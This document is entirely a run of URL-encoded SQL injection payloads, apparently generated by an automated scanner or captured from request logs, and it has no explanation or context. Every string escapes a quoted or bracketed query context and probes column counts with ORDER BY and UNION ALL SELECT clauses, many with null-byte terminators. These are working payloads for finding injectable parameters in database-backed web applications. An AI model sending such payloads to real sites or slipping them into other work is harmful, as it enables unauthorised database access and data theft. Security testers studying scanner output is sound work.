-3237%27%29%29%29%20UNION%20ALL%20SELECT%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%00%20AND%20%28%28%28%27qEuR%27%20LIKE%20%27qEuR -7689%27%29%29%29%20UNION%20ALL%20SELECT%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%2C%205840%00%20AND%20%28%28%28%27tKkH%27%20LIKE%20%27tKkH -9367%27%20ORDER%20BY%201%00%20AND%20%27bNqc%27%20LIKE%20%27bNqc -5041%27%20ORDER%20BY%203228%00%20AND%20%27CzST%27%20LIKE%20%27CzST -1763%27%20UNION%20ALL%20SELECT%206904%00%20AND%20%27rLeI%27%20LIKE%20%27rLeI -1181%27%20UNION%20ALL%20SELECT%201574%2C%201574%00%20AND%20%27yRpC%27%20LIKE%20%27yRpC -9007%27%20UNION%20ALL%20SELECT%204954%2C%204954%2C%204954%00%20AND%20%27CpPk%27%20LIKE%20%27CpPk -7871%27%20UNION%20ALL%20SELECT%203386%2C%203386%2C%203386%2C%203386%00%20AND%20%27WqUs%27%20LIKE%20%27WqUs -7743%27%20UNION%20ALL%20SELECT%201842%2C%201842%2C%201842%2C%201842%2C%201842%00%20AND%20%27BGCl%27%20LIKE%20%27BGCl -2885%27%20UNION%20ALL%20SELECT%207805%2C%207805%2C%207805%2C%207805%2C%207805%2C%207805%00%20AND%20%27rjta%27%20LIKE%20%27rjta -5183%27%20UNION%20ALL%20SELECT%204013%2C%204013%2C%204013%2C%204013%2C%204013%2C%204013%2C%204013%00%20AND%20%27bdcO%27%20LIKE%20%27bdcO -8732%27%20UNION%20ALL%20SELECT%201974%2C%201974%2C%201974%2C%201974%2C%201974%2C%201974%2C%201974%2C%201974%00%20AND%20%27YOyB%27%20LIKE%20%27YOyB -5315%27%20UNION%20ALL%20SELECT%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%00%20AND%20%27DiPm%27%20LIKE%20%27DiPm -4805%27%20UNION%20ALL%20SELECT%206100%2C%206100%2C%206100%2C%206100%2C%206100%2C%206100%2C%206100%2C%206100%2C%206100%2C%206100%00%20AND%20%27GqxN%27%20LIKE%20%27GqxN -5781%22%29%20ORDER%20BY%201%00%20AND%20%28%22tdGS%22%3D%22tdGS -9604%22%29%20ORDER%20BY%206264%00%20AND%20%28%22oAUf%22%3D%22oAUf -8346%22%29%20UNION%20ALL%20SELECT%206402%00%20AND%20%28%22dGZK%22%3D%22dGZK -9103%22%29%20UNION%20ALL%20SELECT%206261%2C%206261%00%20AND%20%28%22zars%22%3D%22zars -8492%22%29%20UNION%20ALL%20SELECT%204856%2C%204856%2C%204856%00%20AND%20%28%22xeJn%22%3D%22xeJn -3620%22%29%20UNION%20ALL%20SELECT%207951%2C%207951%2C%207951%2C%207951%00%20AND%20%28%22kJhv%22%3D%22kJhv -8378%22%29%20UNION%20ALL%20SELECT%209553%2C%209553%2C%209553%2C%209553%2C%209553%00%20AND%20%28%22mdcm%22%3D%22mdcm -3296%22%29%20UNION%20ALL%20SELECT%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%00%20AND%20%28%22SNyK%22%3D%22SNyK -6882%22%29%20UNION%20ALL%20SELECT%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%00%20AND%20%28%22HFIa%22%3D%22HFIa -1744%22%29%20UNION%20ALL%20SELECT%205244%2C%205244%2C%205244%2C%205244%2C%205244%2C%205244%2C%205244%2C%205244%00%20AND%20%28%22MthA%22%3D%22MthA -9097%22%29%20UNION%20ALL%20SELECT%205987%2C%205987%2C%205987%2C%205987%2C%205987%2C%205987%2C%205987%2C%205987%2C%205987%00%20AND%20%28%22IdKr%22%3D%22IdKr -5757%22%29%20UNION%20ALL%20SELECT%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%2C%202133%00%20AND%20%28%22gkAW%22%3D%22gkAW -4285%22%29%29%20ORDER%20BY%201%00%20AND%20%28%28%22AVpm%22%3D%22AVpm -6014%22%29%29%20ORDER%20BY%206495%00%20AND%20%28%28%22ddXJ%22%3D%22ddXJ -6690%22%29%29%20UNION%20ALL%20SELECT%202516%00%20AND%20%28%28%22fYeN%22%3D%22fYeN -9087%22%29%29%20UNION%20ALL%20SELECT%209776%2C%209776%00%20AND%20%28%28%22pQOX%22%3D%22pQOX -4357%22%29%29%20UNION%20ALL%20SELECT%203549%2C%203549%2C%203549%00%20AND%20%28%28%22dVVE%22%3D%22dVVE -2417%22%29%29%20UNION%20ALL%20SELECT%204994%2C%204994%2C%204994%2C%204994%00%20AND%20%28%28%22CYrG%22%3D%22CYrG -8561%22%29%29%20UNION%20ALL%20SELECT%207803%2C%207803%2C%207803%2C%207803%2C%207803%00%20AND%20%28%28%22MVge%22%3D%22MVge -2374%22%29%29%20UNION%20ALL%20SELECT%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%00%20AND%20%28%28%22fFVI%22%3D%22fFVI -1069%22%29%29%20UNION%20ALL%20SELECT%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%00%20AND%20%28%28%22PpOb%22%3D%22PpOb -3716%22%29%29%20UNION%20ALL%20SELECT%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%2C%202696%00%20AND%20%28%28%22urTW%22%3D%22urTW -6841%22%29%29%20UNION%20ALL%20SELECT%206999%2C%206999%2C%206999%2C%206999%2C%206999%2C%206999%2C%206999%2C%206999%2C%206999%00%20AND%20%28%28%22LAcy%22%3D%22LAcy -5069%22%29%29%20UNION%20ALL%20SELECT%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%2C%204791%00%20AND%20%28%28%22ejUl%22%3D%22ejUl -2928%22%29%29%29%20ORDER%20BY%201%00%20AND%20%28%28%28%22RsTY%22%3D%22RsTY -5076%22%29%29%29%20ORDER%20BY%202701%00%20AND%20%28%28%28%22ikGt%22%3D%22ikGt -6071%22%29%29%29%20UNION%20ALL%20SELECT%201784%00%20AND%20%28%28%28%22zpJO%22%3D%22zpJO -6174%22%29%29%29%20UNION%20ALL%20SELECT%206085%2C%206085%00%20AND%20%28%28%28%22nhTC%22%3D%22nhTC -6872%22%29%29%29%20UNION%20ALL%20SELECT%208520%2C%208520%2C%208520%00%20AND%20%28%28%28%22GWwZ%22%3D%22GWwZ -7434%22%29%29%29%20UNION%20ALL%20SELECT%208112%2C%208112%2C%208112%2C%208112%00%20AND%20%28%28%28%22UfLg%22%3D%22UfLg -4501%22%29%29%29%20UNION%20ALL%20SELECT%203509%2C%203509%2C%203509%2C%203509%2C%203509%00%20AND%20%28%28%28%22bqrT%22%3D%22bqrT -1535%22%29%29%29%20UNION%20ALL%20SELECT%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%00%20AND%20%28%28%28%22mPUd%22%3D%22mPUd -3997%22%29%29%29%20UNION%20ALL%20SELECT%203821%2C%203821%2C%203821%2C%203821%2C%203821%2C%203821%2C%203821%00%20AND%20%28%28%28%22ZqId%22%3D%22ZqId -4980%22%29%29%29%20UNION%20ALL%20SELECT%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%00%20AND%20%28%28%28%22AGon%22%3D%22AGon -9288%22%29%29%29%20UNION%20ALL%20SELECT%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%00%20AND%20%28%28%28%22LmqC%22%3D%22LmqC -8362%22%29%29%29%20UNION%20ALL%20SELECT%209878%2C%209878%2C%209878%2C%209878%2C%209878%2C%209878%2C%209878%2C%209878%2C%209878%2C%209878%00%20AND%20%28%28%28%22OHQg%22%3D%22OHQg -1000%22%20ORDER%20BY%201%00%20AND%20%22gxkU%22%3D%22gxkU -6126%22%20ORDER%20BY%201384%00%20AND%20%22ptSV%22%3D%22ptSV -6545%22%20UNION%20ALL%20SELECT%207206%00%20AND%20%22KhjD%22%3D%22KhjD -6016%22%20UNION%20ALL%20SELECT%204252%2C%204252%00%20AND%20%22QaZc%22%3D%22QaZc -8868%22%20UNION%20ALL%20SELECT%205018%2C%205018%2C%205018%00%20AND%20%22gFCk%22%3D%22gFCk -1518%22%20UNION%20ALL%20SELECT%207223%2C%207223%2C%207223%2C%207223%00%20AND%20%22MapE%22%3D%22MapE -2188%22%20UNION%20ALL%20SELECT%206282%2C%206282%2C%206282%2C%206282%2C%206282%00%20AND%20%22svDa%22%3D%22svDa -6990%22%20UNION%20ALL%20SELECT%207173%2C%207173%2C%207173%2C%207173%2C%207173%2C%207173%00%20AND%20%22Cqsc%22%3D%22Cqsc -3152%22%20UNION%20ALL%20SELECT%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%00%20AND%20%22hFav%22%3D%22hFav -8988%22%20UNION%20ALL%20SELECT%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%2C%205643%00%20AND%20%22cXUO%22%3D%22cXUO -6013%22%20UNION%20ALL%20SELECT%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%2C%201298%00%20AND%20%22IwYl%22%3D%22IwYl -8598%22%20UNION%20ALL%20SELECT%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%2C%207263%00%20AND%20%22eUbG%22%3D%22eUbG -8151%22%29%20ORDER%20BY%201%00%20AND%20%28%22piBN%22%20LIKE%20%22piBN -7369%22%29%20ORDER%20BY%202943%00%20AND%20%28%22NgcC%22%20LIKE%20%22NgcC -5887%22%29%20UNION%20ALL%20SELECT%207598%00%20AND%20%28%22YlQq%22%20LIKE%20%22YlQq -6132%22%29%20UNION%20ALL%20SELECT%201741%2C%201741%00%20AND%20%28%22mnoo%22%20LIKE%20%22mnoo -2699%22%29%20UNION%20ALL%20SELECT%205983%2C%205983%2C%205983%00%20AND%20%28%22LXrv%22%20LIKE%20%22LXrv -2556%22%29%20UNION%20ALL%20SELECT%201647%2C%201647%2C%201647%2C%201647%00%20AND%20%28%22Pwti%22%20LIKE%20%22Pwti -7937%22%29%20UNION%20ALL%20SELECT%203273%2C%203273%2C%203273%2C%203273%2C%203273%00%20AND%20%28%22pBWQ%22%20LIKE%20%22pBWQ -4165%22%29%20UNION%20ALL%20SELECT%202393%2C%202393%2C%202393%2C%202393%2C%202393%2C%202393%00%20AND%20%28%22ZeXx%22%20LIKE%20%22ZeXx -2324%22%29%20UNION%20ALL%20SELECT%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303%2C%209303%00%20AND%20%28%22RhAq%22%20LIKE%20%22RhAq -3676%22%29%20UNION%20ALL%20SELECT%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%00%20AND%20%28%22AWwV%22%20LIKE%20%22AWwV -2420%22%29%20UNION%20ALL%20SELECT%207165%2C%207165%2C%207165%2C%207165%2C%207165%2C%207165%2C%207165%2C%207165%2C%207165%00%20AND%20%28%22YbCe%22%20LIKE%20%22YbCe -5190%22%29%20UNION%20ALL%20SELECT%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%2C%204813%00%20AND%20%28%22NiGq%22%20LIKE%20%22NiGq -6350%22%29%29%20ORDER%20BY%201%00%20AND%20%28%28%22RGFo%22%20LIKE%20%22RGFo -9660%22%29%29%20ORDER%20BY%201420%00%20AND%20%28%28%22JwKy%22%20LIKE%20%22JwKy -7082%22%29%29%20UNION%20ALL%20SELECT%205178%00%20AND%20%28%28%22Itpv%22%20LIKE%20%22Itpv -3355%22%29%29%20UNION%20ALL%20SELECT%202862%2C%202862%00%20AND%20%28%28%22bAyH%22%20LIKE%20%22bAyH -6933%22%29%29%20UNION%20ALL%20SELECT%201406%2C%201406%2C%201406%00%20AND%20%28%28%22Rsnw%22%20LIKE%20%22Rsnw -5147%22%29%29%20UNION%20ALL%20SELECT%203506%2C%203506%2C%203506%2C%203506%00%20AND%20%28%28%22zyvY%22%20LIKE%20%22zyvY -9001%22%29%29%20UNION%20ALL%20SELECT%203235%2C%203235%2C%203235%2C%203235%2C%203235%00%20AND%20%28%28%22wqBL%22%20LIKE%20%22wqBL -1609%22%29%29%20UNION%20ALL%20SELECT%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%00%20AND%20%28%28%22xTRm%22%20LIKE%20%22xTRm -6252%22%29%29%20UNION%20ALL%20SELECT%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%00%20AND%20%28%28%22mDSq%22%20LIKE%20%22mDSq -9128%22%29%29%20UNION%20ALL%20SELECT%208188%2C%208188%2C%208188%2C%208188%2C%208188%2C%208188%2C%208188%2C%208188%00%20AND%20%28%28%22UIYq%22%20LIKE%20%22UIYq -1123%22%29%29%20UNION%20ALL%20SELECT%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%00%20AND%20%28%28%22oRAo%22%20LIKE%20%22oRAo -5671%22%29%29%20UNION%20ALL%20SELECT%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%00%20AND%20%28%28%22cfat%22%20LIKE%20%22cfat -9234%22%29%29%29%20ORDER%20BY%201%00%20AND%20%28%28%28%22NQDk%22%20LIKE%20%22NQDk -1382%22%29%29%29%20ORDER%20BY%204188%00%20AND%20%28%28%28%22YbgY%22%20LIKE%20%22YbgY -8740%22%29%29%29%20UNION%20ALL%20SELECT%206155%00%20AND%20%28%28%28%22XFZd%22%20LIKE%20%22XFZd -9689%22%29%29%29%20UNION%20ALL%20SELECT%207959%2C%207959%00%20AND%20%28%28%28%22CVwq%22%20LIKE%20%22CVwq -6861%22%29%29%29%20UNION%20ALL%20SELECT%208184%2C%208184%2C%208184%00%20AND%20%28%28%28%22kNIX%22%20LIKE%20%22kNIX -4176%22%29%29%29%20UNION%20ALL%20SELECT%205944%2C%205944%2C%205944%2C%205944%00%20AND%20%28%28%28%22DJZu%22%20LIKE%20%22DJZu -1137%22%29%29%29%20UNION%20ALL%20SELECT%201113%2C%201113%2C%201113%2C%201113%2C%201113%00%20AND%20%28%28%28%22aygN%22%20LIKE%20%22aygN -1712%22%29%29%29%20UNION%20ALL%20SELECT%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%00%20AND%20%28%28%28%22SzoG%22%20LIKE%20%22SzoG -9606%22%29%29%29%20UNION%20ALL%20SELECT%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%00%20AND%20%28%28%28%22RWXs%22%20LIKE%20%22RWXs -8431%22%29%29%29%20UNION%20ALL%20SELECT%201592%2C%201592%2C%201592%2C%201592%2C%201592%2C%201592%2C%201592%2C%201592%00%20AND%20%28%28%28%22DtzH%22%20LIKE%20%22DtzH -5415%22%29%29%29%20UNION%20ALL%20SELECT%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%00%20AND%20%28%28%28%22KVQz%22%20LIKE%20%22KVQz -2331%22%29%29%29%20UNION%20ALL%20SELECT%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%2C%208396%00%20AND%20%28%28%28%22PcVh%22%20LIKE%20%22PcVh -4768%22%20ORDER%20BY%201%00%20AND%20%22gUyZ%22%20LIKE%20%22gUyZ -8715%22%20ORDER%20BY%204474%00%20AND%20%22fvol%22%20LIKE%20%22fvol -7861%22%20UNION%20ALL%20SELECT%205276%00%20AND%20%22HSLL%22%20LIKE%20%22HSLL -5681%22%20UNION%20ALL%20SELECT%201582%2C%201582%00%20AND%20%22UeXx%22%20LIKE%20%22UeXx -5089%22%20UNION%20ALL%20SELECT%202684%2C%202684%2C%202684%00%20AND%20%22BYHe%22%20LIKE%20%22BYHe -2265%22%20UNION%20ALL%20SELECT%209220%2C%209220%2C%209220%2C%209220%00%20AND%20%22aJrB%22%20LIKE%20%22aJrB -3538%22%20UNION%20ALL%20SELECT%201890%2C%201890%2C%201890%2C%201890%2C%201890%00%20AND%20%22YFYi%22%20LIKE%20%22YFYi -6893%22%20UNION%20ALL%20SELECT%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%00%20AND%20%22OSAV%22%20LIKE%20%22OSAV -1974%22%20UNION%20ALL%20SELECT%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%00%20AND%20%22qQhQ%22%20LIKE%20%22qQhQ -7189%22%20UNION%20ALL%20SELECT%202869%2C%202869%2C%202869%2C%202869%2C%202869%2C%202869%2C%202869%2C%202869%00%20AND%20%22BOHw%22%20LIKE%20%22BOHw -4381%22%20UNION%20ALL%20SELECT%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%00%20AND%20%22pQTu%22%20LIKE%20%22pQTu -7996%22%20UNION%20ALL%20SELECT%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%2C%204206%00%20AND%20%22Ewcl%22%20LIKE%20%22Ewcl -4691%29%20WHERE%206424%3D6424%20ORDER%20BY%201%00 -5605%29%20WHERE%201703%3D1703%20ORDER%20BY%209188%00 -8230%29%20WHERE%204703%3D4703%20UNION%20ALL%20SELECT%204703%00 -9086%29%20WHERE%204138%3D4138%20UNION%20ALL%20SELECT%204138%2C%204138%00 -4843%29%20WHERE%205602%3D5602%20UNION%20ALL%20SELECT%205602%2C%205602%2C%205602%00 -9653%29%20WHERE%205033%3D5033%20UNION%20ALL%20SELECT%205033%2C%205033%2C%205033%2C%205033%00 -6738%29%20WHERE%201236%3D1236%20UNION%20ALL%20SELECT%201236%2C%201236%2C%201236%2C%201236%2C%201236%00 -4029%29%20WHERE%206586%3D6586%20UNION%20ALL%20SELECT%206586%2C%206586%2C%206586%2C%206586%2C%206586%2C%206586%00 -6444%29%20WHERE%202068%3D2068%20UNION%20ALL%20SELECT%202068%2C%202068%2C%202068%2C%202068%2C%202068%2C%202068%2C%202068%00 -1666%29%20WHERE%202388%3D2388%20UNION%20ALL%20SELECT%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%00 -6405%29%20WHERE%209480%3D9480%20UNION%20ALL%20SELECT%209480%2C%209480%2C%209480%2C%209480%2C%209480%2C%209480%2C%209480%2C%209480%2C%209480%00 -4791%29%20WHERE%209783%3D9783%20UNION%20ALL%20SELECT%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%00 -9086%27%29%20WHERE%207023%3D7023%20ORDER%20BY%201%00 -6811%27%29%20WHERE%204615%3D4615%20ORDER%20BY%205727%00 -6429%27%29%20WHERE%205939%3D5939%20UNION%20ALL%20SELECT%205939%00 -2183%27%29%20WHERE%206191%3D6191%20UNION%20ALL%20SELECT%206191%2C%206191%00 -8819%27%29%20WHERE%207757%3D7757%20UNION%20ALL%20SELECT%207757%2C%207757%2C%207757%00 -1110%27%29%20WHERE%205104%3D5104%20UNION%20ALL%20SELECT%205104%2C%205104%2C%205104%2C%205104%00 -9512%27%29%20WHERE%209428%3D9428%20UNION%20ALL%20SELECT%209428%2C%209428%2C%209428%2C%209428%2C%209428%00 -4062%27%29%20WHERE%206865%3D6865%20UNION%20ALL%20SELECT%206865%2C%206865%2C%206865%2C%206865%2C%206865%2C%206865%00 -4647%27%29%20WHERE%208154%3D8154%20UNION%20ALL%20SELECT%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%2C%208154%00 -6404%27%29%20WHERE%209146%3D9146%20UNION%20ALL%20SELECT%209146%2C%209146%2C%209146%2C%209146%2C%209146%2C%209146%2C%209146%2C%209146%00 -2512%27%29%20WHERE%202425%3D2425%20UNION%20ALL%20SELECT%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%00 -3329%27%29%20WHERE%209983%3D9983%20UNION%20ALL%20SELECT%209983%2C%209983%2C%209983%2C%209983%2C%209983%2C%209983%2C%209983%2C%209983%2C%209983%2C%209983%00 -6180%27%20WHERE%209079%3D9079%20ORDER%20BY%201%00 -2254%27%20WHERE%201879%3D1879%20ORDER%20BY%207900%00 -4621%27%20WHERE%206787%3D6787%20UNION%20ALL%20SELECT%206787%00 -9543%27%20WHERE%206866%3D6866%20UNION%20ALL%20SELECT%206866%2C%206866%00 -7300%27%20WHERE%201879%3D1879%20UNION%20ALL%20SELECT%201879%2C%201879%2C%201879%00 -1228%27%20WHERE%203235%3D3235%20UNION%20ALL%20SELECT%203235%2C%203235%2C%203235%2C%203235%00 -1351%27%20WHERE%204727%3D4727%20UNION%20ALL%20SELECT%204727%2C%204727%2C%204727%2C%204727%2C%204727%00 -3861%27%20WHERE%204397%3D4397%20UNION%20ALL%20SELECT%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%00 -9040%27%20WHERE%206335%3D6335%20UNION%20ALL%20SELECT%206335%2C%206335%2C%206335%2C%206335%2C%206335%2C%206335%2C%206335%00 -7968%27%20WHERE%205297%3D5297%20UNION%20ALL%20SELECT%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%00 -4206%27%20WHERE%202673%3D2673%20UNION%20ALL%20SELECT%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%2C%202673%00 -9503%27%20WHERE%201209%3D1209%20UNION%20ALL%20SELECT%201209%2C%201209%2C%201209%2C%201209%2C%201209%2C%201209%2C%201209%2C%201209%2C%201209%2C%201209%00 -7269%22%20WHERE%202746%3D2746%20ORDER%20BY%201%00 -5399%22%20WHERE%204902%3D4902%20ORDER%20BY%209997%00 -8583%22%20WHERE%201880%3D1880%20UNION%20ALL%20SELECT%201880%00 -9710%22%20WHERE%206755%3D6755%20UNION%20ALL%20SELECT%206755%2C%206755%00 -7457%22%20WHERE%205943%3D5943%20UNION%20ALL%20SELECT%205943%2C%205943%2C%205943%00 -3620%22%20WHERE%202175%3D2175%20UNION%20ALL%20SELECT%202175%2C%202175%2C%202175%2C%202175%00 -1340%22%20WHERE%206746%3D6746%20UNION%20ALL%20SELECT%206746%2C%206746%2C%206746%2C%206746%2C%206746%00 -2700%22%20WHERE%206253%3D6253%20UNION%20ALL%20SELECT%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%00 -1989%22%20WHERE%203486%3D3486%20UNION%20ALL%20SELECT%203486%2C%203486%2C%203486%2C%203486%2C%203486%2C%203486%2C%203486%00 -2150%22%20WHERE%205783%3D5783%20UNION%20ALL%20SELECT%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%00 -1298%22%20WHERE%205431%3D5431%20UNION%20ALL%20SELECT%205431%2C%205431%2C%205431%2C%205431%2C%205431%2C%205431%2C%205431%2C%205431%2C%205431%00 -5448%22%20WHERE%202153%3D2153%20UNION%20ALL%20SELECT%202153%2C%202153%2C%202153%2C%202153%2C%202153%2C%202153%2C%202153%2C%202153%2C%202153%2C%202153%00 -3193%27%20%7C%7C%20%28SELECT%201500%20FROM%20DUAL%20WHERE%206505%3D6505%20ORDER%20BY%201%00%20%29%20%7C%7C%20%27 -6025%27%20%7C%7C%20%28SELECT%208531%20FROM%20DUAL%20WHERE%206021%3D6021%20ORDER%20BY%202021%00%20%29%20%7C%7C%20%27 -2439%27%20%7C%7C%20%28SELECT%207498%20FROM%20DUAL%20WHERE%206037%3D6037%20UNION%20ALL%20SELECT%206037%00%20%29%20%7C%7C%20%27 -3222%27%20%7C%7C%20%28SELECT%209227%20FROM%20DUAL%20WHERE%202147%3D2147%20UNION%20ALL%20SELECT%202147%2C%202147%00%20%29%20%7C%7C%20%27 -8617%27%20%7C%7C%20%28SELECT%204958%20FROM%20DUAL%20WHERE%206436%3D6436%20UNION%20ALL%20SELECT%206436%2C%206436%2C%206436%00%20%29%20%7C%7C%20%27 -7445%27%20%7C%7C%20%28SELECT%205860%20FROM%20DUAL%20WHERE%206354%3D6354%20UNION%20ALL%20SELECT%206354%2C%206354%2C%206354%2C%206354%00%20%29%20%7C%7C%20%27 -8956%27%20%7C%7C%20%28SELECT%205208%20FROM%20DUAL%20WHERE%201206%3D1206%20UNION%20ALL%20SELECT%201206%2C%201206%2C%201206%2C%201206%2C%201206%00%20%29%20%7C%7C%20%27 -7830%27%20%7C%7C%20%28SELECT%205570%20FROM%20DUAL%20WHERE%205883%3D5883%20UNION%20ALL%20SELECT%205883%2C%205883%2C%205883%2C%205883%2C%205883%2C%205883%00%20%29%20%7C%7C%20%27 -2171%27%20%7C%7C%20%28SELECT%209473%20FROM%20DUAL%20WHERE%208988%3D8988%20UNION%20ALL%20SELECT%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%2C%208988%00%20%29%20%7C%7C%20%27 -1820%27%20%7C%7C%20%28SELECT%204529%20FROM%20DUAL%20WHERE%208666%3D8666%20UNION%20ALL%20SELECT%208666%2C%208666%2C%208666%2C%208666%2C%208666%2C%208666%2C%208666%2C%208666%00%20%29%20%7C%7C%20%27 -9725%27%20%7C%7C%20%28SELECT%206124%20FROM%20DUAL%20WHERE%203983%3D3983%20UNION%20ALL%20SELECT%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%00%20%29%20%7C%7C%20%27 -8615%27%20%7C%7C%20%28SELECT%201429%20FROM%20DUAL%20WHERE%208508%3D8508%20UNION%20ALL%20SELECT%208508%2C%208508%2C%208508%2C%208508%2C%208508%2C%208508%2C%208508%2C%208508%2C%208508%2C%208508%00%20%29%20%7C%7C%20%27 -2261%27%20%7C%7C%20%28SELECT%208725%20WHERE%206696%3D6696%20ORDER%20BY%201%00%20%29%20%7C%7C%20%27 -5154%27%20%7C%7C%20%28SELECT%204625%20WHERE%205456%3D5456%20ORDER%20BY%209350%00%20%29%20%7C%7C%20%27 -5029%27%20%7C%7C%20%28SELECT%201095%20WHERE%209658%3D9658%20UNION%20ALL%20SELECT%209658%00%20%29%20%7C%7C%20%27 -1991%27%20%7C%7C%20%28SELECT%205518%20WHERE%205485%3D5485%20UNION%20ALL%20SELECT%205485%2C%205485%00%20%29%20%7C%7C%20%27 -1704%27%20%7C%7C%20%28SELECT%201462%20WHERE%202236%3D2236%20UNION%20ALL%20SELECT%202236%2C%202236%2C%202236%00%20%29%20%7C%7C%20%27 -7275%27%20%7C%7C%20%28SELECT%208723%20WHERE%207680%3D7680%20UNION%20ALL%20SELECT%207680%2C%207680%2C%207680%2C%207680%00%20%29%20%7C%7C%20%27 -7120%27%20%7C%7C%20%28SELECT%203015%20WHERE%205147%3D5147%20UNION%20ALL%20SELECT%205147%2C%205147%2C%205147%2C%205147%2C%205147%00%20%29%20%7C%7C%20%27 -2065%27%20%7C%7C%20%28SELECT%201262%20WHERE%204245%3D4245%20UNION%20ALL%20SELECT%204245%2C%204245%2C%204245%2C%204245%2C%204245%2C%204245%00%20%29%20%7C%7C%20%27 -7518%27%20%7C%7C%20%28SELECT%203560%20WHERE%201903%3D1903%20UNION%20ALL%20SELECT%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%00%20%29%20%7C%7C%20%27 -9600%27%20%7C%7C%20%28SELECT%207602%20WHERE%204472%3D4472%20UNION%20ALL%20SELECT%204472%2C%204472%2C%204472%2C%204472%2C%204472%2C%204472%2C%204472%2C%204472%00%20%29%20%7C%7C%20%27 -3184%27%20%7C%7C%20%28SELECT%204117%20WHERE%209359%3D9359%20UNION%20ALL%20SELECT%209359%2C%209359%2C%209359%2C%209359%2C%209359%2C%209359%2C%209359%2C%209359%2C%209359%00%20%29%20%7C%7C%20%27 -7797%27%20%7C%7C%20%28SELECT%203930%20WHERE%206304%3D6304%20UNION%20ALL%20SELECT%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%00%20%29%20%7C%7C%20%27 -8000%20%2B%20%28SELECT%204622%20FROM%20DUAL%20WHERE%206427%3D6427%20ORDER%20BY%201%00%20%29 -7804%20%2B%20%28SELECT%201281%20FROM%20DUAL%20WHERE%201302%3D1302%20ORDER%20BY%204140%00%20%29 -7046%20%2B%20%28SELECT%206777%20FROM%20DUAL%20WHERE%205136%3D5136%20UNION%20ALL%20SELECT%205136%00%20%29 -5205%20%2B%20%28SELECT%208442%20FROM%20DUAL%20WHERE%202252%3D2252%20UNION%20ALL%20SELECT%202252%2C%202252%00%20%29 -7126%20%2B%20%28SELECT%206088%20FROM%20DUAL%20WHERE%207978%3D7978%20UNION%20ALL%20SELECT%207978%2C%207978%2C%207978%00%20%29 -1106%20%2B%20%28SELECT%202094%20FROM%20DUAL%20WHERE%209587%3D9587%20UNION%20ALL%20SELECT%209587%2C%209587%2C%209587%2C%209587%00%20%29 -3094%20%2B%20%28SELECT%204855%20FROM%20DUAL%20WHERE%208256%3D8256%20UNION%20ALL%20SELECT%208256%2C%208256%2C%208256%2C%208256%2C%208256%00%20%29 -7465%20%2B%20%28SELECT%207785%20FROM%20DUAL%20WHERE%202908%3D2908%20UNION%20ALL%20SELECT%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%00%20%29 -7715%20%2B%20%28SELECT%206118%20FROM%20DUAL%20WHERE%203960%3D3960%20UNION%20ALL%20SELECT%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%00%20%29 